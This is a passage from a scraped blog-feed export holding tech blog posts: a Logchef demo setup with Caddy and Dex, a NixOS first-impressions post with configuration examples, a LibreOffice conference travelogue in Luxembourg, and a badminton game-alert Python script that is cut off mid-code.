frequently\n\n[sinks.clickhouse_syslog]\n# ... config to send to Clickhouse ...\ntable = \"syslogs\"\n\n\nSecuring Admin Endpoints (Demo Mode): Since this is a public, shared instance, I wanted to prevent users from making potentially disruptive changes via the API (like deleting sources or teams). I used Caddy as the reverse proxy and configured it to intercept requests to admin-specific API routes (like \u002Fapi\u002Fv1\u002Fadmin\u002F*) and block any method other than GET. If someone tries a POST, PUT, or DELETE to these endpoints, Caddy returns a 403 Forbidden directly. This keeps the demo environment stable.\nCaddyfile snippet (conceptual)\nhandle \u002Fapi\u002Fv1\u002Fadmin\u002F* {\n    @block_methods method POST PUT DELETE PATCH\n    respond @block_methods `{\"error\":\"Operation not permitted in demo mode\"}` 403\n    reverse_proxy logchef:8125 # Forward GET requests\n}\n\n\nImproving Demo Login UX: Logchef uses OIDC for authentication. For the demo, I’m running Dex as the OIDC provider. To make it completely frictionless for users, I didn’t want them needing to sign up or guess credentials. I simply customized Dex’s theme template for the login page to explicitly display the static demo username (demo@logchef.app) and password (password) right there. It’s a small UX tweak (again, thanks to Kailash for the idea!), but it means anyone landing on the demo can log in instantly.\n\u003C!-- Dex login template snippet -->\n\u003Cdiv class=\"dex-info-box\">\n  \u003Cstrong>Demo Credentials:\u003C\u002Fstrong>\u003Cbr>\n  Username: \u003Ccode>demo@logchef.app\u003C\u002Fcode>\u003Cbr>\n  Password: \u003Ccode>password\u003C\u002Fcode>\n\u003C\u002Fdiv>\n\u003Cinput ... value=\"demo@logchef.app\" ...\u002F>\n\u003Cinput ... type=\"password\" value=\"password\" ...\u002F>\n\n\nWhat’s Next?#\nLogchef is already being used internally, but the journey towards a full v1.0 release continues this year. 
The roadmap includes exciting additions like:\nAlerting: Trigger notifications based on query results.\nLive Tail Logs: Stream logs in real-time.\nEnhanced Dashboarding: More powerful visualization capabilities.\nLogchef is open source (AGPLv3), and community involvement is welcomed. You can check out the Demo or view the code on GitHub.\nIf you have more ideas or features you’d like to see, please reach out on GitHub or email me! I’m always open to suggestions and feedback.\nHonestly, building Logchef has been incredibly rewarding. It started as a way to fix something that bugged me (and others!), and seeing it turn into a tool I’m genuinely excited about feels great.\nI couldn’t have done it alone, though. I’m really grateful to my friends and colleagues who jumped in with feedback along the way. Huge thanks to Kailash for the constant support and encouragement, and to Vivek, Sarat, and Rohan for testing the early builds and offering great suggestions.\nFinally, a big thank you to my wife, who patiently endured my late-night coding sessions. Her support means the world to me \u003C3\nFin!",[],{"slug":637,"title":638,"link":639,"pubDate":640,"contentSnippet":641,"tags":642,"maintainerName":410,"maintainerUsername":411,"maintainerPhoto":412,"feedUrl":413},"motorcycle-engines","Inside the Machine: A Look at Motorcycle Engines","https:\u002F\u002Fworkdone0.substack.com\u002Fp\u002Fmotorcycle-engines","Sun, 27 Apr 2025 00:00:00 GMT","Peek under the hood as we explore how motorcycle engines work, what makes them tick, and why their engineering is so thrilling — from cylinders to spark plugs.",[],{"slug":644,"title":645,"link":646,"pubDate":647,"contentSnippet":648,"tags":649,"maintainerName":410,"maintainerUsername":411,"maintainerPhoto":412,"feedUrl":413},"cost-of-lies","The Cost of Lies","https:\u002F\u002Fworkdone0.substack.com\u002Fp\u002Fcost-of-lies","Wed, 23 Apr 2025 00:00:00 GMT","Every lie we tell ourselves—about our history, our neighbours, our ideals—demands a hidden tribute. This essay unpacks the stakes of self-deception in politics, society, and memory.",[],{"slug":651,"title":652,"link":653,"pubDate":654,"contentSnippet":655,"tags":656,"maintainerName":410,"maintainerUsername":411,"maintainerPhoto":412,"feedUrl":413},"feynman-letter","You, Still","https:\u002F\u002Fworkdone0.substack.com\u002Fp\u002Ffeynman-letter","Tue, 22 Apr 2025 00:00:00 GMT","A moving look at Richard Feynman’s letter to his late wife, revealing how love can persist in absence — raw, quiet, and deeply true.",[],{"slug":658,"title":659,"link":660,"pubDate":661,"contentSnippet":662,"tags":663,"maintainerName":410,"maintainerUsername":411,"maintainerPhoto":412,"feedUrl":413},"deep-learning-intro","Getting Started with Deep Learning: A Hands-On Introduction","https:\u002F\u002Fworkdone0.substack.com\u002Fp\u002Fdeep-learning-intro","Tue, 15 Apr 2025 00:00:00 GMT","Learn how to build a working deep learning image classifier in just a few lines of code — and peek behind the scenes to understand what really happens under the hood.",[],{"slug":665,"title":666,"link":667,"pubDate":668,"contentSnippet":669,"tags":670,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-6","Keeping it Old-Tool: REPL habits of a grug-brained Clojure programmer","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fdemo-clojure-workflow-scicloj\u002Findex.html","Fri, 28 Mar 2025 00:00:00 +0000","Is demo of Grug Clojure code vibe. He no catch onto cloud LLM magics for some reason. 
Still prefer program with only brain-muscles. Prefer use Grug language standard library and standard dev tools. Prefer make and use all byte on local disk. Maybe luddite, maybe obsolete. Grug no mind. Fine with how he code. Besides, Grug like muscles. Hope maybe you see tip, trick, tactic to steal. Take what can use, no take what no can use.",[55,49,457,54,52,246,227,244,245],{"slug":672,"title":673,"link":674,"pubDate":675,"contentSnippet":676,"tags":677,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"trying-nixos","Trying out NixOS","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Ftrying-nixos\u002F","2025-03-23T04:45:00.000Z","I was introduced to Nix by my colleagues at work. Being a Linux user for over a decade and a serial distro hopper, I was curious to learn more about it. I’d seen Nix mentioned before, but the comments about its steep learning curve made me wonder if the effort was worth it. I decided to give it a try by reading this excellent beginner’s guide; however, I got bored very quickly and decided to “learn on the fly”. I spun up a VM in my homelab to install NixOS using their official GUI installer image.\nInstallation & First Impressions#\nThe installation was as straightforward as any other Linux distro. NixOS is a declarative operating system that leverages the Nix functional package manager and a rich ecosystem of Nix packages. The flexibility is mind-blowing: you can configure everything, from user accounts and SSH keys to $SHELL config and plugins, entirely through code.\nOnce installed, the first place you’d want to poke around is the \u002Fetc\u002Fnixos directory, which contains two essential configuration files:\nhardware-configuration.nix: Generated during installation (or regenerated with commands like nixos-generate-config), it has hardware-specific details such as filesystem mount points, disk configurations, kernel modules, etc. See an example file here.\nconfiguration.nix: This is the most important file and the one to start editing. Here you define system-wide settings like timezone, locale, user accounts, and networking. Everything is declared in one place, making your system’s state reproducible.\nFirst Configuration Changes#\nWhen I opened the terminal, I immediately noticed that vim wasn’t installed. So, I updated my configuration.nix to include the packages I needed:\nenvironment.systemPackages = with pkgs; [\n  git\n  vim\n];\nAfter saving, I ran:\nsudo nixos-rebuild switch\nThis rebuilds the system using the new declarative configuration.\nVersion Control & Flakes#\nNext, I wanted to set up version control for my Nix configurations. The key takeaway is that while the system’s state is revertible in NixOS, your personal data (which includes configuration.nix) isn’t automatically backed up. You must manage your own version history for your Nix configs. 
Since I was tweaking with no knowledge of Nix, having a version history was crucial.\nI moved my \u002Fetc\u002Fnixos configs to ~\u002FCode\u002Fnixos-configs and initialized a Git repository:\n# Create repo in home directory (better than root-owned \u002Fetc\u002Fnixos)\nmkdir ~\u002Fnixos-config\ncp -r \u002Fetc\u002Fnixos\u002F* ~\u002Fnixos-config\u002F\ncd ~\u002Fnixos-config\n\n# Initialize Git\ngit init\ngit add .\ngit commit -m \"Initial NixOS configuration\"\n\n# Add GitHub remote\ngit remote add origin https:\u002F\u002Fgithub.com\u002Fusername\u002Fnixos-config.git\ngit push -u origin main\nHere’s how flake.nix looks:\n{\n  description = \"NixOS configuration for Karan's homelab, servers, and personal dev machines\";\n\n  inputs = {\n    nixpkgs.url = \"github:nixos\u002Fnixpkgs\u002Fnixos-unstable\";\n    \n    # Add agenix as an input\n    agenix = {\n      url = \"github:ryantm\u002Fagenix\";\n      inputs.nixpkgs.follows = \"nixpkgs\";\n    };\n    # Optionally add other inputs like home-manager\n    # home-manager = {\n    #   url = \"github:nix-community\u002Fhome-manager\u002Frelease-24.11\";\n    #   inputs.nixpkgs.follows = \"nixpkgs\";\n    # };\n  };\n\n  outputs = { self, agenix, nixpkgs, ... }@inputs: {\n    # Make agenix available as a package\n    packages.x86_64-linux.agenix = agenix.packages.x86_64-linux.default;\n    \n    nixosConfigurations.work = nixpkgs.lib.nixosSystem {\n      system = \"x86_64-linux\";\n      modules = [\n        .\u002Fconfiguration.nix\n        agenix.nixosModules.default  # Add agenix module\n      ];\n    };\n  };\n}\nA Note on Flakes#\nFlakes are an experimental (although widely adopted in the community) feature in Nix that bring reproducibility, composability, and a standardized structure to your configurations and package definitions. They allow you to declare all inputs (like nixpkgs, home-manager, or other repositories) and outputs (such as system configurations, packages, or development shells) in a single file. Flakes also create a lock file (flake.lock) that pins your dependencies to specific revisions, ensuring that your builds remain reproducible over time.\nI learned the hard way that, even for local configurations, you must commit your files. Otherwise, you may see errors like:\npath '\u002Fnix\u002Fstore\u002F...source\u002Fflake.nix' does not exist\nEven if you’re using local paths and have no intention to push to git, you still need git init && git add for flakes to work.\nFrom whatever google-fu I did, it seems this requirement is to ensure that flakes can reliably reference the exact content in your configuration.\nI am sure there might be good reasons for it (as I said before, I’ve skipped RTFMing altogether ^_^), but at least the errors could be more verbose\u002Fhelpful.\nAnd why I skipped docs: Remember, we’re on a mission to get things up and running with Nix, and only later spend time reading the internals if it actually proves to be a valuable experiment.\nSwitching Channels#\nWhile installing packages, I noticed some packages were quite outdated. That’s when I learned about NixOS channels. Think of channels as analogous to LTS releases. For faster updates, you can switch to the unstable channel. 
Although the name sounds intimidating, it simply means you’ll receive more frequent package updates.\nTo do this, you can edit your flake.nix and switch the URL to an unstable channel:\n  inputs = {\n    - nixpkgs.url = \"github:NixOS\u002Fnixpkgs\u002Fnixos-24.11\"; # Stable channel\n    + nixpkgs.url = \"github:NixOS\u002Fnixpkgs\u002Fnixos-unstable\"; # Unstable channel\n  };\nFirmware Updates#\nAfter setting up packages, it was time to configure firmware updates using fwupd—essential for keeping your hardware up to date.\nI asked Claude to help me with a quick setup. Here’s what I did:\n{ config, pkgs, ... }:\n\n{\n  services.fwupd.enable = true;\n}\nThen run a rebuild:\nsudo nixos-rebuild switch\nOnce enabled, you can use the fwupdmgr command-line tool to manage firmware updates:\n# Refresh metadata and check for available updates\nfwupdmgr refresh\nfwupdmgr get-updates\n# Install available firmware updates\nfwupdmgr update\nFine Tuning#\nI also tweaked some settings for the Nix package manager to optimize builds, caching, and overall performance. Here’s a snippet from my configuration:\n  # Nix package manager optimizations\n  nix = {\n    settings = {\n      # Optimize store to remove duplicate files\n      auto-optimise-store = true;\n\n      # Allow building multiple derivations in parallel\n      max-jobs = \"auto\";\n\n      # Number of parallel build tasks per job\n      cores = 0; # 0 means use all available cores\n\n      # Use the binary cache aggressively\n      substituters = [\n        \"https:\u002F\u002Fcache.nixos.org\"\n        \"https:\u002F\u002Fnix-community.cachix.org\"\n        \"https:\u002F\u002Fnixpkgs-wayland.cachix.org\"\n      ];\n\n      # Optimize fetching from GitHub\n      connect-timeout = 5;\n\n      # Prevent unneeded rebuilds\n      commit-lockfile-summary = \"Update flake.lock\";\n    };\n\n    # Garbage collection settings\n    gc = {\n      automatic = true;\n      dates = \"weekly\";\n      options = \"--delete-older-than 30d\";\n    };\n\n    # Optimize builds using different build cores\n    buildCores = 0; # 0 means use all available cores\n\n    # Enable flakes and modern Nix command features\n    extraOptions = ''\n      experimental-features = nix-command flakes\n      warn-dirty = false\n      keep-going = true\n      log-lines = 20\n    '';\n  };\nEscape Hatches#\nSo far, things seem all rosy. Within just a couple of minutes, I had a perfectly working machine - and the best part: all reproducible with a single command. I was starting to see why people who use NixOS preach about it so much.\nHowever, not everything is smooth when you deviate from the happy path. For instance, I use Aider for LLM-assisted programming, but the version on Nixpkgs was about three minor versions behind. Typically, for any other software, I wouldn’t have cared so much - however, with these LLM tools, a lot changes rapidly and I didn’t want to fall behind. 
Besides, it seemed like a fun exercise in getting my hands dirty by installing a Python package on NixOS, which turned out to be quite tricky because Nix is absurdly obsessive about fully isolated builds.\nHere’s an example flake that I used for attempting to install Aider with uv in a dev shell (which didn’t work btw):\n{\n  description = \"Aider development environment\";\n\n  inputs = {\n    nixpkgs.url = \"github:NixOS\u002Fnixpkgs\u002Fnixos-unstable\";\n    flake-utils.url = \"github:numtide\u002Fflake-utils\";\n  };\n\n  outputs = { self, nixpkgs, flake-utils }:\n    flake-utils.lib.eachDefaultSystem (system:\n      let\n        pkgs = nixpkgs.legacyPackages.${system};\n      in\n      {\n        devShell = pkgs.mkShell {\n          buildInputs = with pkgs; [\n            python312\n            uv\n          ];\n          shellHook = ''\n            export PATH=\"$HOME\u002F.local\u002Fbin:$PATH\"\n          '';\n        };\n      }\n    );\n}\nEntering the dev shell with nix develop and installing Aider with uv:\nuv tool install --force --python python3.12 aider-chat@latest\nHowever, I ran into this error:\n\"\u002Fhome\u002Fkaran\u002F.local\u002Fshare\u002Fuv\u002Ftools\u002Faider-chat\u002Flib\u002Fpython3.12\u002Fsite-packages\u002Flitellm\u002Flitellm_core_uti\nls\u002Fllm_cost_calc\u002Futils.py\", line 9, in \u003Cmodule>\n    from litellm.utils import get_model_info\n  File\n\"\u002Fhome\u002Fkaran\u002F.local\u002Fshare\u002Fuv\u002Ftools\u002Faider-chat\u002Flib\u002Fpython3.12\u002Fsite-packages\u002Flitellm\u002Futils.py\", line\n53, in \u003Cmodule>\n    from tokenizers import Tokenizer\n  File\n\"\u002Fhome\u002Fkaran\u002F.local\u002Fshare\u002Fuv\u002Ftools\u002Faider-chat\u002Flib\u002Fpython3.12\u002Fsite-packages\u002Ftokenizers\u002F__init__.py\",\nline 78, in \u003Cmodule>\n    from .tokenizers import (\nImportError: libstdc++.so.6: cannot open shared object file: No such file or directory\nThe error indicated that Aider was missing a required dependency, libstdc++.so.6, which is part of the C++ standard library needed by the tokenizers package. To fix this, I added stdenv.cc.cc.lib (and even gcc to be on the safe side) to my buildInputs. This is because while uv installs Python packages, it doesn’t handle system-level dependencies. In a Nix environment, every dependency, including system libraries, must be explicitly specified.\nFrankly, Python’s packaging ecosystem is still a mess. Although tools like uv help, achieving a completely isolated build, especially when shared libraries are involved, is challenging. I wish the Python community would put more effort into resolving these issues.\nWhile I was able to make aider work by explicitly adding all the dependencies, I faced another outdated package: code-cursor. Since this is a full-blown Electron app, I didn’t wish to package this myself.\nAfter some frustration, I tried using Distrobox as recommended by a colleague. Distrobox lets you run containers that feel almost like a native OS by managing user IDs, host mounts, network interfaces, and more. I used an Arch Linux image, installed cursor-bin from the AUR, and everything worked fine. Well, mostly:\nFonts were missing. So, if I want to use custom fonts in my IDE, I need to have them installed in the container as well.\nSince my fish shell config had export EDITOR=nvim, I had to install neovim in the container as well; otherwise, I’d get an error when trying to git commit etc. 
There’s an option to customise the shell in distrobox, but for whatever reason (that I didn’t want to debug), it didn’t work for me.\nYet, something still felt off. The whole point of using NixOS is to achieve a fully declarative and reproducible setup. Resorting to an escape hatch like Distrobox undermines that goal. So I was very conflicted about this. I’m sure there’s a better way to handle these situations, and I should probably read the docs to find out.\nFinal Thoughts#\nI’m definitely sold on running NixOS, especially when managing multiple systems. With a single declarative file (configuration.nix), duplicating your setup across machines becomes effortless. No more “documenting” (or rather forgetting to document and keeping it updated) - as the config is the single source of truth.\nFun fact: I even messed up my NixOS build by misconfiguring the hardware-configuration.nix, and my system became unusable; even after a reboot, it couldn’t mount the filesystem on the correct device. In other distros, that would have sent me into panic mode, but with NixOS, all I had to do was revert to the previous working state, and everything was fine. That was so cool!\nI’m definitely considering moving my homelab to NixOS in the coming few days because I honestly see the value for a server setup. I often set up my personal server and then forget everything I’ve done, and I’m always scared of touching it or creating a new server from scratch. I even created a small shell script installer to help me get a base system ready. But like this shell script or even tools such as Ansible - they are all idempotent in nature. However, in Nix, if I remove a certain piece from the configuration, there isn’t a trace of it left on the system. That makes it truly declarative and reproducible - unlike Ansible where you can still have some parts of the old setup.\nHowever, for my primary machine at work, I’ll wait on the sidelines until the packages I depend on resolve their dependency issues and I get a chance to read up more on the escape hatches I tried to see if there’s a more streamlined way of doing things. I might be missing a lot of fundamental details since I skipped the docs entirely to get my hands dirty. But now that I see the value of a declarative system and especially how easy it is to roll back the machine to a previously known good state, I’m motivated to read up more on this and might post an update to this blog.\nFin!",[],{"slug":686,"title":687,"link":688,"pubDate":689,"contentSnippet":690,"tags":691,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"libreoffice-conference-2024","Libreoffice Conference 2024 in Luxembourg","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Flibreoffice-conference-2024\u002F","Fri, 14 Mar 2025 21:48:39 +0530","Last year, I attended the annual LibreOffice Conference in Luxembourg with the help of a generous travel grant from The Document Foundation (TDF). 
It was a three-day event from the 10th to the 12th of October 2024, with an additional day for a community meetup on the 9th.\nLuxembourg is a small country in Western Europe. It is insanely wealthy with high living standards. After going through an arduous visa process, I got to the country on the 8th of October. Upon arriving in Luxembourg, I took a bus to the city center, where my hotel — Park Inn — was located. I deboarded the bus at the Luxembourg Central station. Before walking towards my hotel, I stopped to click a few pictures of the beautiful station.\nAll the public transport in Luxembourg was free of cost. The experience of being in Luxembourg was as if I had stepped into another world. The roads had separate tracks for cycling and separate lanes for buses, along with wide footpaths. In addition, the streets were pretty neat and clean.\n\n      \nLuxembourg's Findel Airport. Photo by Ravi Dwivedi. Released under the CC-BY-SA 4.0.\n\n      \nSeparate cycling tracks in Luxembourg. Photo by Ravi Dwivedi. Released under the CC-BY-SA 4.0.\n\n      \nA random road in Luxembourg with separate lane for buses. Photo by Ravi Dwivedi. Released under the CC-BY-SA 4.0.\nThe conference venue was in Belval, while I stayed in the city center. Even though my stay was 20 km from the conference venue, the commute was convenient thanks to the free-of-cost train connections. The train rides were comfortable, smooth, and scenic, covering the distance in half an hour. Moreover, I never found the trains to be very crowded, which enabled me to always get a seat.\n\n      \nThis is what trains look like in Luxembourg. Photo by Ravi Dwivedi. Released under the CC-BY-SA 4.0.\n\n      \nThe train ride from my hotel to the conference venue had some scenic views like this one on the way. Photo by Ravi Dwivedi. Released under the CC-BY-SA 4.0.\n\n      \nA tram in Luxembourg with Luxembourg Central station in the background. Photo by Ravi Dwivedi. Released under the CC-BY-SA 4.0.\nMy breakfast was included in the hotel booking. The breakfast had many options. It had coffee and fruit juices, along with diverse food options. Some of the items I remember were croissant, pain au chocolat, brie (a type of cheese), scrambled eggs, boiled eggs, and various types of meat dishes. Other than this, there were fruits such as pears.\n\n      \nThat circular pie in the center of the image is brie - a type of cheese - which I found delicious. Photo by Ravi Dwivedi. Released under the CC-BY-SA 4.0.\nPre-conference, a day was reserved for the community meetup on the 9th of October. On that day, the community members introduced themselves and their contributions to the LibreOffice project. It acted as a brainstorming session. All the attendees got a lovely conference bag, which contained a T-Shirt, a pen and a few stickers. I also met my long-time collaborators Mike, Sophie and Italo from the TDF, with whom I had interacted only remotely till then. I also met TDF’s sysadmin Guilhem, with whom I had interacted before regarding setting up my LibreOffice mirror.\n\n      \nLovely swag bag. Photo by Ravi Dwivedi. Released under the CC-BY-SA 4.0.\nThe conference started on the 10th. There were 5 attendees from India, including me, while most of the attendees were from Europe. The talks were in English. One of the talks that stood out for me was about Luxchat — a chat service run by the Luxembourg government based on the Matrix protocol for the citizens of Luxembourg. I also liked Italo’s talk on why document formats must be freedom-respecting. 
On the first night, the conference took us to a nice dinner in a restaurant. It offered one more way to socialize with other attendees and explore food at the same time.\n\n      \nA slide from Italo's talk on document freedom. Photo by Ravi Dwivedi. Released under the CC-BY-SA 4.0.\n\n      \nPicture of the hall in which talks were held. Photo by Ravi Dwivedi. Released under the CC-BY-SA 4.0.\nOn the 11th of October, I went for a walk in the morning with Biswadeep for some sightseeing around our hotel area. As a consequence, I missed the group photo of the conference, which I wanted to be in. Anyway, we enjoyed roaming around the picturesque Luxembourg city. We also sampled a tram ride to return to our hotel.\n\n      \nWe encountered such scenic views during our walk. Photo by Ravi Dwivedi. Released under the CC-BY-SA 4.0.\n\n      \nAnother view of Luxembourg city area. Photo by Ravi Dwivedi. Released under the CC-BY-SA 4.0.\nThe conference ended on the 12th with a couple of talks. This conference gave me an opportunity to meet the global LibreOffice community, connect and share ideas. It also gave me a peek into the country of Luxembourg and its people, where I had good experience. English was widely known, and I had no issues getting by.\nThanks to all the organizers and sponsors of the conference!",[],{"slug":693,"title":694,"link":695,"pubDate":696,"contentSnippet":697,"tags":698,"maintainerName":130,"maintainerUsername":131,"maintainerPhoto":132,"feedUrl":133},"riscing-it","RISC-ing It: An incoming landscape shift?","https:\u002F\u002Fwww.divyamohan.com\u002Friscing-it\u002F","Thu, 06 Mar 2025 14:27:33 GMT","The implications of China's RISC-V strategy on global semiconductor and open source ecosystems.",[699,700,701],"policy","tech","Open Source",{"slug":703,"title":704,"link":705,"pubDate":706,"contentSnippet":707,"tags":708,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"playo-badminton","Automating Badminton Game Alerts","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fplayo-badminton\u002F","2025-03-03T18:40:55.000Z","I’ve been playing badminton more regularly since the start of 2025 - almost 4-5 days a week. I recently moved to a new part of the city, which meant I couldn’t play with my old friends anymore. PlayO has been super helpful for finding games with new people. On PlayO, a host creates a game and up to 6 people can join one court for a one-hour badminton doubles session.\nHowever, on hectic days I would often forget to check for badminton games, only to find them fully booked later. I wanted to automate this process by creating a small script that would send me scheduled alerts about today’s game availability, allowing me to book slots before they filled up. I drew inspiration from Matt’s post where he did something similar.\nThankfully, PlayO has a public API endpoint to retrieve a list of available games: https:\u002F\u002Fapi.playo.io\u002Factivity-public\u002Flist\u002Flocation.\nYou can send a POST request to this URL with these parameters for filtering:\n{\n  \"lat\": 12.9783692,\n  \"lng\": 77.6408356,\n  \"cityRadius\": 5,\n  \"gameTimeActivities\": false,\n  \"page\": 0,\n  \"lastId\": \"\",\n  \"sportId\": [\"SP5\"],\n  \"booking\": false,\n  \"date\": [\"2025-03-04T11:03:17.260Z\"]\n}\nIt returns a list of activities matching these filters. 
One such activity looks like:\n{\n  \"userInfo\": [\n    {\n      \"profilePicUrl\": \"https:\u002F\u002Fplayov2.gumlet.io\u002Fprofiles\u002Fredacted.511716.jpg\",\n      \"fName\": \"Redacted\",\n      \"lName\": \"\",\n      \"karma\": 2800\n    },\n    {\n      \"profilePicUrl\": \"https:\u002F\u002Fplayov2.gumlet.io\u002Fprofiles\u002Fredacted-redacted.png\",\n      \"fName\": \"redacted\",\n      \"lName\": \"N\",\n      \"karma\": 499\n    }\n  ],\n  \"isPlayoGame\": false,\n  \"skill\": \"Intermediate & above\",\n  \"sportName\": \"Badminton\",\n  \"shortListed\": false,\n  \"joineeList\": [\n    \"7f3cf298-3324-4fc2-96ad-b0f00093cd8f\",\n    \"250572a2-555d-4a77-94f0-452142c08f81\",\n    \"cc3b9eb6-a3b5-4c26-8605-0486fa000a4b\",\n    \"8d5d4299-950b-4011-a7ac-b466b1c00e84\",\n    \"235ae56d-6f4f-4106-9304-fb38e7d4add8\"\n  ],\n  \"isPlaypalPlaying\": false,\n  \"lat\": 12.976394040119704,\n  \"lng\": 77.63644146986815,\n  \"location\": \"Game Theory - Double Road Indiranagar, Indiranagar\",\n  \"joineeCount\": 6,\n  \"status\": -1,\n  \"sportsPlayingMode\": {\n    \"name\": \"\",\n    \"icon\": \"\"\n  },\n  \"maxPlayers\": 7,\n  \"full\": false,\n  \"price\": 0,\n  \"startTime\": \"2025-03-04T13:30:00.000Z\",\n  \"endTime\": \"2025-03-04T15:30:00.000Z\",\n  \"minSkill\": 3,\n  \"maxSkill\": 5,\n  \"skillSet\": true,\n  \"booking\": false,\n  \"bookingId\": \"\",\n  \"type\": 0,\n  \"venueId\": \"82af038f-058c-4b2f-bc3d-3a47910d4f97\",\n  \"venueName\": \"Game Theory - Double Road Indiranagar, Indiranagar\",\n  \"activityType\": \"regular\",\n  \"isOnline\": false,\n  \"groupId\": \"\",\n  \"groupName\": \"\",\n  \"currencyTxt\": \"INR\",\n  \"strictSkill\": true,\n  \"date\": \"2025-03-04T00:00:00.000Z\",\n  \"hostId\": \"redacted\",\n  \"sportId\": \"SP5\",\n  \"timing\": 2,\n  \"id\": \"e2ee9f62-c9b6-472b-aea2-b0c52dd7c525\",\n  \"distance\": 0.5249236963063415,\n  \"courtInfo\": \"\",\n  \"sponsored\": false,\n  \"groups\": []\n}\nUsing the above response, I filtered for games where:\nfull is false (This indicates that joineeCount == maxPlayers is not true, meaning spots are still available to join)\nstartTime and endTime fall within 7-8 PM IST\nI also wanted to add a feature to send these details to Telegram for convenient notifications. I then vibe coded with Claude 3.7 to create a Python script to automate this whole process. Impressively, it produced a working script pretty much in a one-shot prompt, though I had to make a few minor tweaks. I quite like Simon Willison’s approach of using uv to build one-shot tools. Managing dependencies, virtual environments, etc.
is still a pain point in Python, but using uv feels like magic by comparison.\n# \u002F\u002F\u002F script\n# requires-python = \">=3.12\"\n# dependencies = [\n#     \"click\",\n#     \"requests\",\n#     \"pytz\",\n#     \"rich\",\n#     \"python-dateutil\",\n#     \"python-telegram-bot\",\n# ]\n# \u002F\u002F\u002F\n\nimport click\nimport requests\nimport json\nimport datetime\nimport pytz\nimport os\nimport sys\nfrom rich.console import Console\nfrom rich.table import Table\nfrom dateutil import parser\nfrom telegram import Bot, InputMediaPhoto\nfrom telegram.constants import ParseMode\nfrom io import BytesIO\nimport asyncio\n\nconsole = Console()\n\n@click.command()\n@click.option(\"--lat\", default=12.9783692, help=\"Latitude for search\")\n@click.option(\"--lng\", default=77.6408356, help=\"Longitude for search\")\n@click.option(\"--radius\", default=50, help=\"City radius in km\")\n@click.option(\"--sport\", default=\"SP5\", help=\"Sport ID (default: SP5 for Badminton)\")\n@click.option(\"--start-time\", default=\"19:00\", help=\"Desired start time (24-hour format HH:MM)\")\n@click.option(\"--end-time\", default=\"20:00\", help=\"Desired end time (24-hour format HH:MM)\")\n@click.option(\"--timezone\", default=\"Asia\u002FKolkata\", help=\"Your timezone\")\n@click.option(\"--verbose\", is_flag=True, help=\"Show detailed information including exact UTC\u002FIST times\")\n@click.option(\"--include-full\", is_flag=True, help=\"Include games that are full\")\n@click.option(\"--telegram\", is_flag=True, help=\"Send results to Telegram\")\n@click.option(\"--telegram-token\", envvar=\"TELEGRAM_BOT_TOKEN\", help=\"Telegram Bot Token (or set TELEGRAM_BOT_TOKEN env var)\")\n@click.option(\"--telegram-chat-id\", envvar=\"TELEGRAM_CHAT_ID\", help=\"Telegram Chat ID (or set TELEGRAM_CHAT_ID env var)\")\ndef find_games(lat, lng, radius, sport, start_time, end_time, timezone, verbose, include_full, telegram, telegram_token, telegram_chat_id):\n    \"\"\"Find available badminton games on Playo matching your criteria.\"\"\"\n    # Get today's date in the specified timezone\n    local_tz = pytz.timezone(timezone)\n    now = datetime.datetime.now(local_tz)\n    today_date = now.strftime(\"%Y-%m-%dT%H:%M:%S.%fZ\")\n\n    # Parse desired time window\n    try:\n        desired_start = datetime.datetime.strptime(start_time, \"%H:%M\").time()\n        desired_end = datetime.datetime.strptime(end_time, \"%H:%M\").time()\n    except ValueError:\n        console.print(\"[bold red]Error:[\u002Fbold red] Invalid time format. 
Please use HH:MM (24-hour format).\")\n        return\n\n    console.print(f\"[bold green]Searching for badminton games around your location...[\u002Fbold green]\")\n    console.print(f\"Looking for games between [bold]{start_time}[\u002Fbold] and [bold]{end_time}[\u002Fbold] IST today\")\n\n    if verbose:\n        console.print(f\"[dim]Search parameters: lat={lat}, lng={lng}, radius={radius}km[\u002Fdim]\")\n        console.print(f\"[dim]Current time in {timezone}: {now.strftime('%Y-%m-%d %H:%M:%S')}[\u002Fdim]\")\n\n    # Prepare API request\n    url = \"https:\u002F\u002Fapi.playo.io\u002Factivity-public\u002Flist\u002Flocation\"\n    payload = {\n        \"lat\": lat,\n        \"lng\": lng,\n        \"cityRadius\": radius,\n        \"gameTimeActivities\": False,\n        \"page\": 0,\n        \"lastId\": \"\",\n        \"sportId\": [sport],\n        \"booking\": False,\n        \"date\": [today_date]\n    }\n\n    headers = {\n        \"Content-Type\": \"application\u002Fjson\",\n        \"User-Agent\": \"Mozilla\u002F5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F91.0.4472.124 Safari\u002F537.36\"\n    }\n\n    try:\n        response = requests.post(url, headers=headers, json=payload)\n        response.raise_for_status()\n        data = response.json()\n\n        if data.get(\"requestStatus\") != 1 or \"data\" not in data:\n            console.print(\"[bold red]Error:[\u002Fbold red] Failed to get valid response from Playo API\")\n            return\n\n        # Process activities\n        activities = data[\"data\"].get(\"activities\", [])\n        if not activities:\n            console.print(\"[yellow]No badminton activities found for today[\u002Fyellow]\")\n            return\n\n        # Filter activities based on criteria\n        matching_games = []\n\n        for activity in activities:\n            # Convert UTC times to local timezone\n            start_time_utc = parser.parse(activity[\"startTime\"])\n            end_time_utc = parser.parse(activity[\"endTime\"])\n\n            start_time_local = start_time_utc.astimezone(local_tz)\n            end_time_local = end_time_utc.astimezone(local_tz)\n\n            # Print all times in debug mode\n            # console.print(f\"DEBUG: {activity.get('location', 'Unknown')} - Start: {start_time_local.strftime('%H:%M')} IST (UTC: {start_time_utc.strftime('%H:%M')})\")\n\n            # Convert time objects correctly for comparison\n            start_hour = start_time_local.hour\n            start_minute = start_time_local.minute\n\n            # Convert desired times to hours and minutes for easier comparison\n            desired_start_hour = desired_start.hour\n            desired_start_minute = desired_start.minute\n            desired_end_hour = desired_end.hour\n            desired_end_minute = desired_end.minute\n\n            # Check if this game starts at 7PM (19:00) and ends at 8PM (20:00)\n            is_time_match = False\n\n            # Get duration in minutes\n            duration_minutes = ((end_time_local.hour * 60 + end_time_local.minute) -\n                               (start_time_local.hour * 60 + 